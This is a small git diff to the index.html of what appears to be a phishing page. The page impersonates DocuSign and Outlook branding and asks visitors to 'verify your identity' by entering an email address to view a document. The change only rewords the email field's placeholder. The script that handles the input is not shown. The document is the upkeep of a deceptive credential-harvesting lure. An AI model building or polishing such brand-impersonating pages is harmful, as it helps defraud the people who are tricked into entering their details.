--- a/index.html
+++ b/index.html
@@ -72,7 +72,7 @@
         <img src="https://docucdn-a.akamaihd.net/olive/images/2.65.0/global-assets/ds-logo-default.svg" alt="Outlook Logo" class="logo"><br>
         <h1>Email Authentication</h1>
         <p>To access this document, you will need to verify your identity.</p><br><br>
-        <input type="email" id="email" placeholder="Enter the recipient's email to view document"> </br></br>
+        <input type="email" id="email" placeholder="Enter the recipient's email here."> </br></br>
         <button onclick="validateEmail()">REVIEW DOCUMENT HERE</button>
     </div>
 
